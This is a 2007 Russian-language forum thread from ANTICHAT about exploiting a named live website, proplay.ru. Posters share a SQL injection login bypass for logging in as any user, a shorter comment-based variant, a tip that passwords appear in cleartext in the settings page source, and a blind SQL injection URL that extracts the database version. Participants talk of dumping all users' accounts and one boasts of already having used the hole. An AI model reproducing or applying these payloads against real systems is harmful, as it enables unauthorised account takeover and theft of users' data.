HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Уязвимость на proplay.ru
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость на proplay.ru
  #1  
Старый 04.06.2007, 16:13
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами: 10088966

Репутация: 646


По умолчанию Уязвимость на proplay.ru
Посодействовал l1ght, за что ему большое спасибо. Суть баги в том, что можно залогиниться под любым аккаунтом следующим способом:

Логин: -1
Пароль: ' union select id,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll/*

Где id - id юзера.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 04.06.2007, 16:37
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами: 10188326

Репутация: 1866


По умолчанию
Как уже сказал гема хватает просто:
user'/*
asd

И ещё, если хотите узнать пароль - зайдите в /users/settings/ там будет пароль за звёздочками, открывайте сорцы страницы - там будет пароль в чистом виде...
 
Ответить с цитированием

  #3  
Старый 04.06.2007, 16:52
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами: 10088966

Репутация: 646


По умолчанию
Первый метод подойдет, скажем, для создания БД всех юзеров (путем перебора id).
 
Ответить с цитированием

  #4  
Старый 05.06.2007, 17:25
loc
Новичок
Регистрация: 01.06.2007
Сообщений: 7
С нами: 9970828

Репутация: 0
Exclamation
Эх.... жаль перекрыли уже ) Но я успел поюзать .... Респект авторам!!!
Последний раз редактировалось loc; 05.06.2007 в 17:32..
 
Ответить с цитированием

  #5  
Старый 07.06.2007, 15:24
BlasT
Новичок
Регистрация: 23.08.2005
Сообщений: 6
С нами: 10902563

Репутация: 0
По умолчанию
http://www.proplay.ru/forums/cs/7909'/
есть еще одна sql токо не как немогу подобрать правильное кол-во полей кто поможет?
 
Ответить с цитированием

  #6  
Старый 09.06.2007, 11:45
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами: 10088966

Репутация: 646


По умолчанию
Как подбираешь? Это не скуля, а просто бажок в скрипте, в частности, в инклудинге. Ничего там не поимеешь

З.Ы. Хотя сорри, затупил. Теперь вижу...
Последний раз редактировалось Joker-jar; 09.06.2007 в 11:49.. Причина: гыыы
 
Ответить с цитированием

  #7  
Старый 09.06.2007, 12:03
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами: 10088966

Репутация: 646


По умолчанию
На счет union точно не знаю. Посимвольный перебор:
Код:
http://www.proplay.ru/forums/q3'+and+ascii(lower(substring(version(),1,1)))=0x35+and+'1'='1/
MySQL 5.x
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Os - моя крепость Elekt Избранное 32 06.08.2009 15:10
На Windows «налипла» уязвимость DJ.KilleR Мировые новости. Обсуждения. 10 15.03.2007 02:21
Подборка уязвимостей phpBB -=ka$at1k=- Уязвимости CMS / форумов 3 02.07.2006 15:26
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ? bike Уязвимости CMS / форумов 2 24.12.2005 17:28
Уязвимость в iChat'е. -SX- Болталка 0 15.01.2005 23:46



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.